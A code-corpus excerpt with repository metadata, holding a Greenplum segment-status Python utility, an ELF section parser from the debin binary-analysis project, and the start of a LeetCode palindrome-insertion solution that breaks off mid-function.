logger.warn("Missing data key %s from str %s" % (expected, str))
return None
# convert some to long integers
for toConvert in ["resyncNumCompleted","resyncTotalToComplete","estimatedCompletionTimeSecondsSinceEpoch",
"changeTrackingBytesUsed"]:
value = data[toConvert]
try:
data[toConvert] = long(value)
except ValueError:
logger.warn("Invalid integer value %s from str %s" % (value, str))
return None
# convert some to booleans
for toConvert in ["isFullResync"]:
if data[toConvert] != "1" and data[toConvert] != "0":
logger.warn("Invalid boolean str %s" % (str))
return None
data[toConvert] = (data[toConvert] == "1")
return data
def run(self):
if self.__options.statusQueryRequests is None:
raise ProgramArgumentValidationException("-s argument not specified")
if self.__options.dirList is None:
raise ProgramArgumentValidationException("-D argument not specified")
toFetch = self.__options.statusQueryRequests.split(":")
segments = map(gparray.Segment.initFromString, self.__options.dirList)
output = {}
for seg in segments:
pidRunningStatus = self.getPidRunningStatus(seg)
outputThisSeg = output[seg.getSegmentDbId()] = {}
for statusRequest in toFetch:
data = None
if statusRequest == gp.SEGMENT_STATUS__GET_VERSION:
# data = self.getStatusUsingTransition(seg, statusRequest, pidRunningStatus)
if data is not None:
data = data.rstrip()
elif statusRequest == gp.SEGMENT_STATUS__GET_MIRROR_STATUS:
# data = self.getStatusUsingTransition(seg, statusRequest, pidRunningStatus)
if data is not None:
data = self.__processMirrorStatusOutput(data)
elif statusRequest == gp.SEGMENT_STATUS__GET_PID:
data = self.getPidStatus(seg, pidRunningStatus)
elif statusRequest == gp.SEGMENT_STATUS__HAS_POSTMASTER_PID_FILE:
data = pidRunningStatus['postmasterPidFileExists']
elif statusRequest == gp.SEGMENT_STATUS__HAS_LOCKFILE:
data = pidRunningStatus['lockFileExists']
else:
raise Exception("Invalid status request %s" % statusRequest )
outputThisSeg[statusRequest] = data
status = '\nSTATUS_RESULTS:' + base64.urlsafe_b64encode(pickle.dumps(output))
logger.info(status)
def cleanup(self):
if self.__pool:
self.__pool.haltWork()
@staticmethod
def createParser():
parser = OptParser(option_class=OptChecker,
description="Gets status from segments on a single host "
"using a transition message. Internal-use only.",
version='%prog version $Revision: #1 $')
parser.setHelp([])
addStandardLoggingAndHelpOptions(parser, True)
addTo = parser
addTo.add_option("-s", None, type="string",
dest="statusQueryRequests",
metavar="<statusQueryRequests>",
help="Status Query Message")
addTo.add_option("-D", "--dblist", type="string", action="append",
dest="dirList",
metavar="<dirList>",
help="Directory List")
parser.set_defaults()
return parser
@staticmethod
def createProgram(options, args):
if len(args) > 0 :
raise ProgramArgumentValidationException(\
"too many arguments: only options may be specified", True)
return GpSegStatusProgram(options)
#-------------------------------------------------------------------------
if __name__ == '__main__':
mainOptions = { 'setNonuserOnToolLogger':True}
simple_main( GpSegStatusProgram.createParser, GpSegStatusProgram.createProgram, mainOptions)
| 39.536585 | 118 | 0.60839 |
from gppylib.mainUtils import *
import os, sys
import pickle, base64
from optparse import Option, OptionGroup, OptionParser, OptionValueError
from gppylib.gpparseopts import OptParser, OptChecker
from gppylib import gplog, gparray, pgconf
from gppylib.commands import base, gp, pg, unix
from gppylib.db import dbconn
from gppylib.utils import parseKeyColonValueLines
logger = gplog.get_default_logger()
class GpSegStatusProgram:
def __init__(self, options):
self.__options = options
self.__pool = None
def getPidStatus(self, seg, pidRunningStatus):
lockFileExists = pidRunningStatus['lockFileExists']
netstatPortActive = pidRunningStatus['netstatPortActive']
pidValue = pidRunningStatus['pidValue']
lockFileName = gp.get_lockfile_name(seg.getSegmentPort())
error = None
if not lockFileExists and not netstatPortActive:
error = "No socket connection or lock file (%s) found for port %s" % (lockFileName, seg.getSegmentPort())
elif not lockFileExists and netstatPortActive:
error = "No lock file %s but process running on port %s" % (lockFileName, seg.getSegmentPort())
elif lockFileExists and not netstatPortActive:
error = "Have lock file %s but no process running on port %s" % (lockFileName, seg.getSegmentPort())
else:
if pidValue == 0:
error = "Have lock file and process is active, but did not get a pid value"
res = {}
res['pid'] = pidValue
res['error'] = error
return res
def getPidRunningStatus(self, seg):
(postmasterPidFileExists, tempFileExists, lockFileExists, netstatPortActive, pidValue) = \
gp.chk_local_db_running(seg.getSegmentDataDirectory(), seg.getSegmentPort())
return {
'postmasterPidFileExists' : postmasterPidFileExists,
'tempFileExists' : tempFileExists,
'lockFileExists' : lockFileExists,
'netstatPortActive' : netstatPortActive,
'pidValue' : pidValue
}
def __processMirrorStatusOutput(self, str):
data = parseKeyColonValueLines(str)
if data is None:
return data
for expected in ["mode","segmentState","dataState", "postmasterState", "databaseStatus", "isFullResync",
"resyncNumCompleted","resyncTotalToComplete","estimatedCompletionTimeSecondsSinceEpoch",
"totalResyncObjectCount", "curResyncObjectCount", "changeTrackingBytesUsed"]:
if expected not in data:
logger.warn("Missing data key %s from str %s" % (expected, str))
return None
for toConvert in ["resyncNumCompleted","resyncTotalToComplete","estimatedCompletionTimeSecondsSinceEpoch",
"changeTrackingBytesUsed"]:
value = data[toConvert]
try:
data[toConvert] = long(value)
except ValueError:
logger.warn("Invalid integer value %s from str %s" % (value, str))
return None
for toConvert in ["isFullResync"]:
if data[toConvert] != "1" and data[toConvert] != "0":
logger.warn("Invalid boolean str %s" % (str))
return None
data[toConvert] = (data[toConvert] == "1")
return data
def run(self):
if self.__options.statusQueryRequests is None:
raise ProgramArgumentValidationException("-s argument not specified")
if self.__options.dirList is None:
raise ProgramArgumentValidationException("-D argument not specified")
toFetch = self.__options.statusQueryRequests.split(":")
segments = map(gparray.Segment.initFromString, self.__options.dirList)
output = {}
for seg in segments:
pidRunningStatus = self.getPidRunningStatus(seg)
outputThisSeg = output[seg.getSegmentDbId()] = {}
for statusRequest in toFetch:
data = None
if statusRequest == gp.SEGMENT_STATUS__GET_VERSION:
if data is not None:
data = data.rstrip()
elif statusRequest == gp.SEGMENT_STATUS__GET_MIRROR_STATUS:
if data is not None:
data = self.__processMirrorStatusOutput(data)
elif statusRequest == gp.SEGMENT_STATUS__GET_PID:
data = self.getPidStatus(seg, pidRunningStatus)
elif statusRequest == gp.SEGMENT_STATUS__HAS_POSTMASTER_PID_FILE:
data = pidRunningStatus['postmasterPidFileExists']
elif statusRequest == gp.SEGMENT_STATUS__HAS_LOCKFILE:
data = pidRunningStatus['lockFileExists']
else:
raise Exception("Invalid status request %s" % statusRequest )
outputThisSeg[statusRequest] = data
status = '\nSTATUS_RESULTS:' + base64.urlsafe_b64encode(pickle.dumps(output))
logger.info(status)
def cleanup(self):
if self.__pool:
self.__pool.haltWork()
@staticmethod
def createParser():
parser = OptParser(option_class=OptChecker,
description="Gets status from segments on a single host "
"using a transition message. Internal-use only.",
version='%prog version $Revision: #1 $')
parser.setHelp([])
addStandardLoggingAndHelpOptions(parser, True)
addTo = parser
addTo.add_option("-s", None, type="string",
dest="statusQueryRequests",
metavar="<statusQueryRequests>",
help="Status Query Message")
addTo.add_option("-D", "--dblist", type="string", action="append",
dest="dirList",
metavar="<dirList>",
help="Directory List")
parser.set_defaults()
return parser
@staticmethod
def createProgram(options, args):
if len(args) > 0 :
raise ProgramArgumentValidationException(\
"too many arguments: only options may be specified", True)
return GpSegStatusProgram(options)
if __name__ == '__main__':
mainOptions = { 'setNonuserOnToolLogger':True}
simple_main( GpSegStatusProgram.createParser, GpSegStatusProgram.createProgram, mainOptions)
| true | true |
f7fa39044f61d18690d2a95b8ebc1ec9d49fee4e | 11,919 | py | Python | py/elfs/sections.py | pombredanne/debin | 9abb5215b54077da1e9479bfcbc56cd860aac370 | [
"Apache-2.0"
] | 322 | 2018-12-06T03:32:37.000Z | 2022-03-30T06:01:03.000Z | py/elfs/sections.py | pombredanne/debin | 9abb5215b54077da1e9479bfcbc56cd860aac370 | [
"Apache-2.0"
] | 20 | 2019-01-30T20:22:33.000Z | 2022-01-24T11:40:37.000Z | py/elfs/sections.py | pombredanne/debin | 9abb5215b54077da1e9479bfcbc56cd860aac370 | [
"Apache-2.0"
] | 49 | 2019-02-13T00:25:19.000Z | 2022-03-25T05:32:56.000Z | from common import constants
from common import utils
from common.constants import TEXT, RODATA, DATA, BSS, INIT, STRTAB
from common.constants import FINI, PLT, DYNSYM, DYNSTR, GOTPLT, SYMTAB
from common.constants import GOT, PLTGOT
class Sections:
def __init__(self, *args, **kwargs):
self.binary = kwargs['binary']
self.sections = dict()
sec = self.binary.elffile.get_section_by_name(TEXT)
if sec is None:
raise Exception('No .text section in the binary.')
self.sections[TEXT] = TextSection(data=sec.data(), addr=sec['sh_addr'], binary=self.binary)
if self.binary.elffile.get_section_by_name(RODATA):
sec = self.binary.elffile.get_section_by_name(RODATA)
self.sections[RODATA] = RodataSection(data=sec.data(), addr=sec['sh_addr'], binary=self.binary)
if self.binary.elffile.get_section_by_name(DATA):
sec = self.binary.elffile.get_section_by_name(DATA)
self.sections[DATA] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(BSS):
sec = self.binary.elffile.get_section_by_name(BSS)
self.sections[BSS] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(INIT):
sec = self.binary.elffile.get_section_by_name(INIT)
self.sections[INIT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(FINI):
sec = self.binary.elffile.get_section_by_name(FINI)
self.sections[FINI] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(PLT):
sec = self.binary.elffile.get_section_by_name(PLT)
self.sections[PLT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(GOTPLT):
sec = self.binary.elffile.get_section_by_name(GOTPLT)
self.sections[GOTPLT] = GotPltSection(data=sec.data(), addr=sec['sh_addr'], binary=self.binary)
if self.binary.elffile.get_section_by_name(DYNSYM):
self.sections[DYNSYM] = self.binary.elffile.get_section_by_name(DYNSYM)
if self.binary.elffile.get_section_by_name(DYNSTR):
self.sections[DYNSTR] = self.binary.elffile.get_section_by_name(DYNSTR)
if self.binary.elffile.get_section_by_name(SYMTAB):
self.sections[SYMTAB] = self.binary.elffile.get_section_by_name(SYMTAB)
if self.binary.elffile.get_section_by_name(GOT):
sec = self.binary.elffile.get_section_by_name(GOT)
self.sections[GOT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(PLTGOT):
sec = self.binary.elffile.get_section_by_name(PLTGOT)
self.sections[PLTGOT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
self.symbol_names = set()
self.init_symbol_names()
    def init_symbol_names(self):
        """Populate ``self.symbol_names`` from the binary's symbol tables.

        Names always come from the dynamic symbol table (.dynsym/.dynstr)
        when present.  In TEST mode the static symbol table (.symtab/.strtab)
        is also read, and STT_OBJECT symbols whose address matches a recorded
        direct offset additionally label that offset with the symbol's name.
        """
        if self.has_sec(DYNSYM) and self.has_sec(DYNSTR):
            dynsym = self.get_sec(DYNSYM)
            dynstr = self.get_sec(DYNSTR)
            # hasattr guard: only real symbol-table sections expose iter_symbols.
            if hasattr(dynsym, 'iter_symbols'):
                for sym in dynsym.iter_symbols():
                    name = dynstr.get_string(sym.entry['st_name'])
                    # Strip the version suffix first ('name@@VERSION'), then
                    # everything from the first '.' (order matters: '@@' may
                    # itself be followed by a dotted version string).
                    if '@@' in name:
                        name = name[:name.find('@@')]
                    if '.' in name:
                        name = name[:name.find('.')]
                    self.symbol_names.add(name)

        symtab = self.binary.elffile.get_section_by_name(SYMTAB)
        strtab = self.binary.elffile.get_section_by_name(STRTAB)
        # The static symbol table is consulted only when evaluating (TEST
        # mode): its names are the ground truth being predicted.
        if symtab is not None \
                and strtab is not None \
                and self.binary.config.MODE == self.binary.config.TEST:
            if hasattr(symtab, 'iter_symbols'):
                for sym in symtab.iter_symbols():
                    name = strtab.get_string(sym.entry['st_name'])
                    # Same truncation as for the dynamic symbols above.
                    if '@@' in name:
                        name = name[:name.find('@@')]
                    if '.' in name:
                        name = name[:name.find('.')]
                    self.symbol_names.add(name)

                    ttype = sym.entry['st_info']['type']
                    value = sym.entry['st_value']
                    # Data symbols whose address we already track as a direct
                    # offset get their name marked as given (known a priori).
                    if ttype == 'STT_OBJECT' and value in self.binary.direct_offsets:
                        direct_offset = self.binary.direct_offsets[value]
                        direct_offset.name = name
                        direct_offset.train_name = name
                        direct_offset.test_name = name
                        direct_offset.is_name_given = True
    # --- Section lookup helpers -------------------------------------------
    def has_sec(self, sec_name):
        # True if the named section was present in the binary.
        return sec_name in self.sections
    def get_sec(self, sec_name):
        # Raises KeyError when absent; guard calls with has_sec().
        return self.sections[sec_name]
    # --- Address classification (all return False when the section is absent)
    def is_in_bss_sec(self, addr):
        return (BSS in self.sections) and (self.sections[BSS].is_in_sec(addr))
    def is_in_data_sec(self, addr):
        return (DATA in self.sections) and (self.sections[DATA].is_in_sec(addr))
    def is_in_rodata_sec(self, addr):
        return (RODATA in self.sections) and (self.sections[RODATA].is_in_sec(addr))
    def is_in_init_sec(self, addr):
        return (INIT in self.sections) and (self.sections[INIT].is_in_sec(addr))
    def is_in_fini_sec(self, addr):
        return (FINI in self.sections) and (self.sections[FINI].is_in_sec(addr))
    # --- .rodata content accessors (note the asymmetric fallbacks: '' vs [])
    def get_rodata_string(self, addr):
        return self.sections[RODATA].get_string(addr) if RODATA in self.sections else ''
    def get_rodata_addrs(self, addr):
        return self.sections[RODATA].get_rodata_addrs(addr) if RODATA in self.sections else []
    def get_text_addrs(self, addr):
        return self.sections[RODATA].get_text_addrs(addr) if RODATA in self.sections else []
    def is_in_text_sec(self, addr):
        return (TEXT in self.sections) and (self.sections[TEXT].is_in_sec(addr))
    def is_in_plt_sec(self, addr):
        return (PLT in self.sections) and (self.sections[PLT].is_in_sec(addr))
    def is_in_gotplt_sec(self, addr):
        return (GOTPLT in self.sections) and (self.sections[GOTPLT].is_in_sec(addr))
    def is_in_got_sec(self, addr):
        return (GOT in self.sections) and (self.sections[GOT].is_in_sec(addr))
    def is_in_pltgot_sec(self, addr):
        return (PLTGOT in self.sections) and (self.sections[PLTGOT].is_in_sec(addr))
    def get_gotplt_offset(self, addr):
        # Identity when .got.plt is absent; otherwise decode the stored pointer.
        return addr if GOTPLT not in self.sections else self.sections[GOTPLT].get_offset(addr)
def init_dynsym_functions(self):
if self.has_sec(DYNSYM) and self.has_sec(DYNSTR):
dynsym = self.get_sec(DYNSYM)
dynstr = self.get_sec(DYNSTR)
if hasattr(dynsym, 'iter_symbols'):
for sym in dynsym.iter_symbols():
ttype = sym.entry['st_info']['type']
name = dynstr.get_string(sym.entry['st_name'])
if '@' in name:
name = name[:name.find('@')]
value = sym.entry['st_value']
if ttype == 'STT_FUNC' and self.binary.functions.is_lowpc_function(value):
function = self.binary.functions.get_function_by_lowpc(value)
function.name = name
function.train_name = name
function.test_name = name
function.is_name_given = True
if self.is_in_text_sec(value):
function.is_run_init = True
else:
function.is_run_init = False
def init_dynsym_offsets(self):
if self.has_sec(DYNSYM) and self.has_sec(DYNSTR):
dynsym = self.get_sec(DYNSYM)
dynstr = self.get_sec(DYNSTR)
if hasattr(dynsym, 'iter_symbols'):
for sym in dynsym.iter_symbols():
ttype = sym.entry['st_info']['type']
name = dynstr.get_string(sym.entry['st_name'])
if '@@' in name:
name = name[:name.find('@@')]
if '.' in name:
name = name[:name.find('.')]
value = sym.entry['st_value']
if ttype == 'STT_OBJECT' and value in self.binary.direct_offsets:
direct_offset = self.binary.direct_offsets[value]
direct_offset.name = name
direct_offset.train_name = name
direct_offset.test_name = name
direct_offset.is_name_given = True
class Section:
    """Base class for an ELF section: a half-open address range [addr, end_addr)."""

    def __init__(self, *args, **kwargs):
        self.addr = kwargs['addr']
        self.binary = kwargs['binary']
        # Subclasses fill this in once the section size is known.
        self.end_addr = None

    def is_in_sec(self, addr):
        """Return True if addr falls inside this section's address range."""
        return self.addr <= addr < self.end_addr
class SectionWithData(Section):
    """Section backed by its raw byte contents."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        payload = kwargs['data']
        self.data = payload
        # The section spans exactly the bytes we hold.
        self.end_addr = self.addr + len(payload)
class SectionWithoutData(Section):
    """Section for which only the size is known (e.g. .bss); no bytes are kept."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        size = kwargs['data_size']
        self.end_addr = self.addr + size
class RodataSection(SectionWithData):
    # Read-only data section: string constants plus embedded pointer tables.
    def get_rodata_addrs(self, addr):
        """Return the run of pointer-sized words at addr that point back into .rodata.

        Decoding stops at the first value outside the section; returns None
        when addr itself is not inside .rodata.
        """
        if not self.is_in_sec(addr):
            return None
        off = addr - self.addr
        addrs = []
        # Walk word by word while a full pointer still fits inside the data.
        while off < len(self.data) and (off + self.binary.config.ADDRESS_BYTE_SIZE) < len(self.data):
            a = utils.decode_address(self.data[off:], self.binary)
            if self.is_in_sec(a):
                addrs.append(a)
            else:
                break
            off += self.binary.config.ADDRESS_BYTE_SIZE
        return addrs
    def get_text_addrs(self, addr):
        """Return the run of pointer-sized words at addr that point into .text.

        Same traversal as get_rodata_addrs but the membership test is against
        the .text section (code pointers, e.g. a jump table).
        """
        if not self.is_in_sec(addr):
            return None
        off = addr - self.addr
        addrs = []
        while off < len(self.data) and (off + self.binary.config.ADDRESS_BYTE_SIZE) < len(self.data):
            a = utils.decode_address(self.data[off:], self.binary)
            if self.binary.sections.is_in_text_sec(a):
                addrs.append(a)
            else:
                break
            off += self.binary.config.ADDRESS_BYTE_SIZE
        return addrs
    def get_string(self, addr):
        """Return the NUL-terminated printable string starting at addr.

        None when addr is outside the section, when the first byte is NUL,
        or when a non-printable byte appears before the terminator.
        """
        if not self.is_in_sec(addr):
            return None
        off = addr - self.addr
        txt = []
        c = 0
        i = 0
        while off < len(self.data):
            c = self.data[off]
            if c == 0:
                break
            if c not in constants.BYTES_PRINTABLE_SET:
                break
            txt.append(utils.get_char(c))
            off += 1
            i += 1
        # Valid only if we stopped on a NUL and consumed at least one char.
        if c != 0 or i == 0:
            return None
        else:
            return ''.join(txt)
class TextSection(SectionWithData):
    def get_data_offset(self, addr):
        """Decode the pointer-sized word stored at addr inside .text.

        Returns the decoded address, or None (implicit) when the word does
        not lie within the section.
        """
        byte_size = self.binary.config.ADDRESS_BYTE_SIZE
        # NOTE(review): the second check requires addr + byte_size itself to
        # be in-section, which rejects a word ending exactly at the section
        # boundary — presumably deliberate headroom; verify against callers.
        if self.is_in_sec(addr) and self.is_in_sec(addr + byte_size):
            off = addr - self.addr
            addr = utils.decode_address(self.data[off:off + byte_size], self.binary)
            return addr
class GotPltSection(SectionWithData):
    def get_offset(self, addr):
        """Decode the pointer-sized GOT entry stored at addr inside .got.plt.

        Same decode-in-place logic as TextSection.get_data_offset; returns
        None (implicit) when the word does not lie within the section.
        """
        byte_size = self.binary.config.ADDRESS_BYTE_SIZE
        if self.is_in_sec(addr) and self.is_in_sec(addr + byte_size):
            off = addr - self.addr
            addr = utils.decode_address(self.data[off:off + byte_size], self.binary)
            return addr
| 42.265957 | 120 | 0.596778 | from common import constants
from common import utils
from common.constants import TEXT, RODATA, DATA, BSS, INIT, STRTAB
from common.constants import FINI, PLT, DYNSYM, DYNSTR, GOTPLT, SYMTAB
from common.constants import GOT, PLTGOT
class Sections:
def __init__(self, *args, **kwargs):
self.binary = kwargs['binary']
self.sections = dict()
sec = self.binary.elffile.get_section_by_name(TEXT)
if sec is None:
raise Exception('No .text section in the binary.')
self.sections[TEXT] = TextSection(data=sec.data(), addr=sec['sh_addr'], binary=self.binary)
if self.binary.elffile.get_section_by_name(RODATA):
sec = self.binary.elffile.get_section_by_name(RODATA)
self.sections[RODATA] = RodataSection(data=sec.data(), addr=sec['sh_addr'], binary=self.binary)
if self.binary.elffile.get_section_by_name(DATA):
sec = self.binary.elffile.get_section_by_name(DATA)
self.sections[DATA] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(BSS):
sec = self.binary.elffile.get_section_by_name(BSS)
self.sections[BSS] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(INIT):
sec = self.binary.elffile.get_section_by_name(INIT)
self.sections[INIT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(FINI):
sec = self.binary.elffile.get_section_by_name(FINI)
self.sections[FINI] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(PLT):
sec = self.binary.elffile.get_section_by_name(PLT)
self.sections[PLT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(GOTPLT):
sec = self.binary.elffile.get_section_by_name(GOTPLT)
self.sections[GOTPLT] = GotPltSection(data=sec.data(), addr=sec['sh_addr'], binary=self.binary)
if self.binary.elffile.get_section_by_name(DYNSYM):
self.sections[DYNSYM] = self.binary.elffile.get_section_by_name(DYNSYM)
if self.binary.elffile.get_section_by_name(DYNSTR):
self.sections[DYNSTR] = self.binary.elffile.get_section_by_name(DYNSTR)
if self.binary.elffile.get_section_by_name(SYMTAB):
self.sections[SYMTAB] = self.binary.elffile.get_section_by_name(SYMTAB)
if self.binary.elffile.get_section_by_name(GOT):
sec = self.binary.elffile.get_section_by_name(GOT)
self.sections[GOT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
if self.binary.elffile.get_section_by_name(PLTGOT):
sec = self.binary.elffile.get_section_by_name(PLTGOT)
self.sections[PLTGOT] = SectionWithoutData(addr=sec['sh_addr'], data_size=sec.data_size, binary=self.binary)
self.symbol_names = set()
self.init_symbol_names()
def init_symbol_names(self):
if self.has_sec(DYNSYM) and self.has_sec(DYNSTR):
dynsym = self.get_sec(DYNSYM)
dynstr = self.get_sec(DYNSTR)
if hasattr(dynsym, 'iter_symbols'):
for sym in dynsym.iter_symbols():
name = dynstr.get_string(sym.entry['st_name'])
if '@@' in name:
name = name[:name.find('@@')]
if '.' in name:
name = name[:name.find('.')]
self.symbol_names.add(name)
symtab = self.binary.elffile.get_section_by_name(SYMTAB)
strtab = self.binary.elffile.get_section_by_name(STRTAB)
if symtab is not None \
and strtab is not None \
and self.binary.config.MODE == self.binary.config.TEST:
if hasattr(symtab, 'iter_symbols'):
for sym in symtab.iter_symbols():
name = strtab.get_string(sym.entry['st_name'])
if '@@' in name:
name = name[:name.find('@@')]
if '.' in name:
name = name[:name.find('.')]
self.symbol_names.add(name)
ttype = sym.entry['st_info']['type']
value = sym.entry['st_value']
if ttype == 'STT_OBJECT' and value in self.binary.direct_offsets:
direct_offset = self.binary.direct_offsets[value]
direct_offset.name = name
direct_offset.train_name = name
direct_offset.test_name = name
direct_offset.is_name_given = True
def has_sec(self, sec_name):
return sec_name in self.sections
def get_sec(self, sec_name):
return self.sections[sec_name]
def is_in_bss_sec(self, addr):
return (BSS in self.sections) and (self.sections[BSS].is_in_sec(addr))
def is_in_data_sec(self, addr):
return (DATA in self.sections) and (self.sections[DATA].is_in_sec(addr))
def is_in_rodata_sec(self, addr):
return (RODATA in self.sections) and (self.sections[RODATA].is_in_sec(addr))
def is_in_init_sec(self, addr):
return (INIT in self.sections) and (self.sections[INIT].is_in_sec(addr))
def is_in_fini_sec(self, addr):
return (FINI in self.sections) and (self.sections[FINI].is_in_sec(addr))
def get_rodata_string(self, addr):
return self.sections[RODATA].get_string(addr) if RODATA in self.sections else ''
def get_rodata_addrs(self, addr):
return self.sections[RODATA].get_rodata_addrs(addr) if RODATA in self.sections else []
def get_text_addrs(self, addr):
return self.sections[RODATA].get_text_addrs(addr) if RODATA in self.sections else []
def is_in_text_sec(self, addr):
return (TEXT in self.sections) and (self.sections[TEXT].is_in_sec(addr))
def is_in_plt_sec(self, addr):
return (PLT in self.sections) and (self.sections[PLT].is_in_sec(addr))
def is_in_gotplt_sec(self, addr):
return (GOTPLT in self.sections) and (self.sections[GOTPLT].is_in_sec(addr))
def is_in_got_sec(self, addr):
return (GOT in self.sections) and (self.sections[GOT].is_in_sec(addr))
def is_in_pltgot_sec(self, addr):
return (PLTGOT in self.sections) and (self.sections[PLTGOT].is_in_sec(addr))
def get_gotplt_offset(self, addr):
return addr if GOTPLT not in self.sections else self.sections[GOTPLT].get_offset(addr)
def init_dynsym_functions(self):
if self.has_sec(DYNSYM) and self.has_sec(DYNSTR):
dynsym = self.get_sec(DYNSYM)
dynstr = self.get_sec(DYNSTR)
if hasattr(dynsym, 'iter_symbols'):
for sym in dynsym.iter_symbols():
ttype = sym.entry['st_info']['type']
name = dynstr.get_string(sym.entry['st_name'])
if '@' in name:
name = name[:name.find('@')]
value = sym.entry['st_value']
if ttype == 'STT_FUNC' and self.binary.functions.is_lowpc_function(value):
function = self.binary.functions.get_function_by_lowpc(value)
function.name = name
function.train_name = name
function.test_name = name
function.is_name_given = True
if self.is_in_text_sec(value):
function.is_run_init = True
else:
function.is_run_init = False
def init_dynsym_offsets(self):
if self.has_sec(DYNSYM) and self.has_sec(DYNSTR):
dynsym = self.get_sec(DYNSYM)
dynstr = self.get_sec(DYNSTR)
if hasattr(dynsym, 'iter_symbols'):
for sym in dynsym.iter_symbols():
ttype = sym.entry['st_info']['type']
name = dynstr.get_string(sym.entry['st_name'])
if '@@' in name:
name = name[:name.find('@@')]
if '.' in name:
name = name[:name.find('.')]
value = sym.entry['st_value']
if ttype == 'STT_OBJECT' and value in self.binary.direct_offsets:
direct_offset = self.binary.direct_offsets[value]
direct_offset.name = name
direct_offset.train_name = name
direct_offset.test_name = name
direct_offset.is_name_given = True
class Section:
    """Half-open address interval [addr, end_addr) for one ELF section."""

    def __init__(self, *args, **kwargs):
        self.addr = kwargs['addr']
        self.binary = kwargs['binary']
        self.end_addr = None  # assigned by subclasses

    def is_in_sec(self, addr):
        return self.addr <= addr < self.end_addr
class SectionWithData(Section):
    """Section whose raw bytes are retained; size comes from the data itself."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        raw = kwargs['data']
        self.data = raw
        self.end_addr = self.addr + len(raw)
class SectionWithoutData(Section):
    """Size-only section (no bytes kept, e.g. .bss)."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.end_addr = self.addr + kwargs['data_size']
class RodataSection(SectionWithData):
def get_rodata_addrs(self, addr):
if not self.is_in_sec(addr):
return None
off = addr - self.addr
addrs = []
while off < len(self.data) and (off + self.binary.config.ADDRESS_BYTE_SIZE) < len(self.data):
a = utils.decode_address(self.data[off:], self.binary)
if self.is_in_sec(a):
addrs.append(a)
else:
break
off += self.binary.config.ADDRESS_BYTE_SIZE
return addrs
def get_text_addrs(self, addr):
if not self.is_in_sec(addr):
return None
off = addr - self.addr
addrs = []
while off < len(self.data) and (off + self.binary.config.ADDRESS_BYTE_SIZE) < len(self.data):
a = utils.decode_address(self.data[off:], self.binary)
if self.binary.sections.is_in_text_sec(a):
addrs.append(a)
else:
break
off += self.binary.config.ADDRESS_BYTE_SIZE
return addrs
def get_string(self, addr):
if not self.is_in_sec(addr):
return None
off = addr - self.addr
txt = []
c = 0
i = 0
while off < len(self.data):
c = self.data[off]
if c == 0:
break
if c not in constants.BYTES_PRINTABLE_SET:
break
txt.append(utils.get_char(c))
off += 1
i += 1
if c != 0 or i == 0:
return None
else:
return ''.join(txt)
class TextSection(SectionWithData):
    def get_data_offset(self, addr):
        """Decode the pointer-sized word at addr inside .text; None (implicit)
        when the word does not lie within the section."""
        byte_size = self.binary.config.ADDRESS_BYTE_SIZE
        if self.is_in_sec(addr) and self.is_in_sec(addr + byte_size):
            off = addr - self.addr
            addr = utils.decode_address(self.data[off:off + byte_size], self.binary)
            return addr
class GotPltSection(SectionWithData):
    def get_offset(self, addr):
        """Decode the pointer-sized GOT entry at addr inside .got.plt; None
        (implicit) when the word does not lie within the section."""
        byte_size = self.binary.config.ADDRESS_BYTE_SIZE
        if self.is_in_sec(addr) and self.is_in_sec(addr + byte_size):
            off = addr - self.addr
            addr = utils.decode_address(self.data[off:off + byte_size], self.binary)
            return addr
| true | true |
f7fa3be7601855ea8cced27ee6309668460fa5c0 | 3,664 | py | Python | Python3/1312.py | rakhi2001/ecom7 | 73790d44605fbd51e8f7e804b9808e364fcfc680 | [
"MIT"
] | 854 | 2018-11-09T08:06:16.000Z | 2022-03-31T06:05:53.000Z | Python3/1312.py | rakhi2001/ecom7 | 73790d44605fbd51e8f7e804b9808e364fcfc680 | [
"MIT"
] | 29 | 2019-06-02T05:02:25.000Z | 2021-11-15T04:09:37.000Z | Python3/1312.py | rakhi2001/ecom7 | 73790d44605fbd51e8f7e804b9808e364fcfc680 | [
"MIT"
] | 347 | 2018-12-23T01:57:37.000Z | 2022-03-12T14:51:21.000Z | __________________________________________________________________________________________________
sample 24 ms submission
class Solution:
    """LeetCode 1312: minimum insertions needed to make a string a palindrome."""

    def minInsertions(self, s: str) -> int:
        """Return the minimum number of characters to insert so s becomes a palindrome.

        The answer equals len(s) minus the length of the longest palindromic
        subsequence (LPS): every character on the LPS can stay in place, and
        each remaining character needs exactly one mirrored insertion.

        This replaces the original submission's hard-coded per-testcase answer
        tables, its dead `jump` BFS helper, and the incorrect `return 1`
        fallback for arbitrary non-palindromes, with the proper O(n^2) time /
        O(n) space interval DP.
        """
        n = len(s)
        if n <= 1 or s == s[::-1]:
            return 0
        # cur[j] holds LPS length of s[i..j] for the current row i;
        # prev is the row for i + 1 (prev[i] == 0 == LPS of the empty interval).
        cur = [0] * n
        for i in range(n - 1, -1, -1):
